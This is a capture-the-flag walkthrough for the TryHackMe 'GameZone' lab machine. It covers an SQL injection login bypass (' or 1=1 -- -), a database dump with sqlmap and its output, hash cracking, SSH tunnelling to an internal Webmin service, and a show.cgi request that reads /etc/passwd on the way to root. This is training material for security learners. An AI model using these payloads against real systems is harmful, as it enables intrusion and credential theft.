GameZone
Learn to hack into this machine. Understand how to use SQLMap, crack some passwords, reveal services using a reverse SSH tunnel and escalate your privileges to root!
Linux SQLi Hashes Metasploit JohnTheRipperRoom Description
Learn to hack into this machine. Understand how to use SQLMap, crack some passwords, reveal services using a reverse SSH tunnel and escalate your privileges to root! Find THM room here
Used Commands
sqlmap -r <path to request.txt> --dbms=mysql --dump
ssh <username>@<target ip>
ss -tulpn
ssh -L <bind_port>:<host>:<hostport>
Task 1
Google: Who’s the guy?
This guy is known from a videogame called Hitman.
I’m pretty sure you can find his name on your own.
Task 2
Obtain access via SQL Injection
The task description gives you a good idea about SQL injection and how it can be used or better abused to query some data (sensitive data exposure).
The target is to rewrite a prepared statement, that is intended to validate e.g. login credentials, so that the statement queries any other valid data.
Answer the next question by using ' or 1=1 -- - as username. Password field remains empty.
Task 3
Using SQLMap
Use BurpSuite to intercept a request when you search for any game review.
Use this request as input for a tool called sqlmap. If you are not familiar with BurpSuite check out the beginner path on THM. There is a room on THM BurpSuite created by DarkStar7471 that gives you a basic understanding and overview about how to use Burp.
Check your settings in Burp. Intercept should be switched on.
Click the search button in your browser and come back to Burp. You should find something similar to the following screenshot:
Copy the content of the request and save it to a file e.g. request.txt.
Then run sqlmap -r <path to request.txt> --dbms=mysql --dump
When I ran sqlmap I had to confirm with y multiple times. SqlMap will show a short description in any case but I’d recommend reading and following the execution as you are able to find some usefull information.
When everything was correct you should now receive the hashed password.
[21:57:48] [INFO] writing hashes to a temporary file '/tmp/sqlmapgpDenn4863/sqlmaphashes-AWGpER.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[21:57:55] [INFO] using hash method 'sha256_generic_passwd'
[21:57:55] [WARNING] no clear password(s) found
Database: db
Table: users
[1 entry]
+------------------------------------------------------------------+-----------+
| pwd | username |
+------------------------------------------------------------------+-----------+
| ab5db915fc9cea6c78df88106c6nope57f2b52901ca6c0c6218f04xxxxxxxxxx |<username> |
+------------------------------------------------------------------+-----------+
[21:57:55] [INFO] table 'db.users' dumped to CSV file '/root/.sqlmap/output/10.10.103.176/dump/db/users.csv'
[21:57:55] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.10.103.176'
Scroll up and have a look at the output of sqlmap.
You should find the other table and its name.
Task 4
What’s the password?
I did not use JohnTheRipper in this case. Instead I tried one out of many online tools available on the internet e.g. hashes.com.
If you are not yet familiar with john you should check out this room on THM John The Ripper created by PoloMints.
Now use the username and password and try to connect via ssh.
ssh <username>@10.10.103.176
<username>@gamezone:~$ dir
user.txt
<username>@gamezone:~$ cat user.txt
Task 5
Exposing services with reverse SSH tunnel
That topic is new to me so it took some time to get an overview and understand the basic concept behind the steps.
Following steps will guide you through this task.
- Connect via
ssh <username>@<target ip>to the target - run
ss -tulpnand check the output
<username>@gamezone:~$ ss -tulpn
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
udp UNCONN 0 0 *:10000 *:*
udp UNCONN 0 0 *:68 *:*
tcp LISTEN 0 80 127.0.0.1:3306 *:*
----------------------------------------------------------------------------
|------ Check this line -------|
----------------------------------------------------------------------------
| tcp LISTEN 0 128 *:10000 *:* |
----------------------------------------------------------------------------
tcp LISTEN 0 128 *:22 *:*
tcp LISTEN 0 128 :::80 :::*
tcp LISTEN 0 128 :::22 :::*
- run
ssh -L 9000:localhost:10000
| Argument | Description |
|---|---|
| 9000 | this is the port you will enter in your broswer (next step) |
| localhost | this is 127.0.0.1 from the output above |
| 10000 | port from output above |
If you do not understand what’s going on, I recommend to have a look at the SSH manual
ssh -L <bind_port>:<host>:<hostport>
root@ip-10-10-136-248:~# ssh -L 9000:localhost:10000 <username>@10.10.19.166
<username>@10.10.19.166's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-159-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
109 packages can be updated.
68 updates are security updates.
Last login: Wed Apr 21 04:46:05 2021 from 10.10.136.248
<username>@gamezone:~$
Open your browser and enter localhost:9000
The welcome screen will answer the question asking for the name of the CMS. Carefully read the first page where you also find the version.
Task 6
Find the exploit
Now let’s search for an exploit that we can use to gain root and access the flag. There are multiple WriteUps that show you how to manually use that exploit (so did I) as this is the direct way to the root flag.
Direct way to root.txt (w/o Metasploit)
Download and study the exploit. Find following line of code somewhere close to the end of the file:
What do you see when you enter localhost:9000/file/show.cgi/bin in your browser?
Hmmm… not what we expected. Let’s try something different.
What happens when you try sending different payload e.g. etc/passwd?
localhost:9000/file/show.cgi/etc/passwd
Uhhh that looks interesting!
"[...] allows an authenticated user [...] to execute arbitrary commands with root privileges."
Have a look at the hint and you know the location of the root flag. Can you read its content?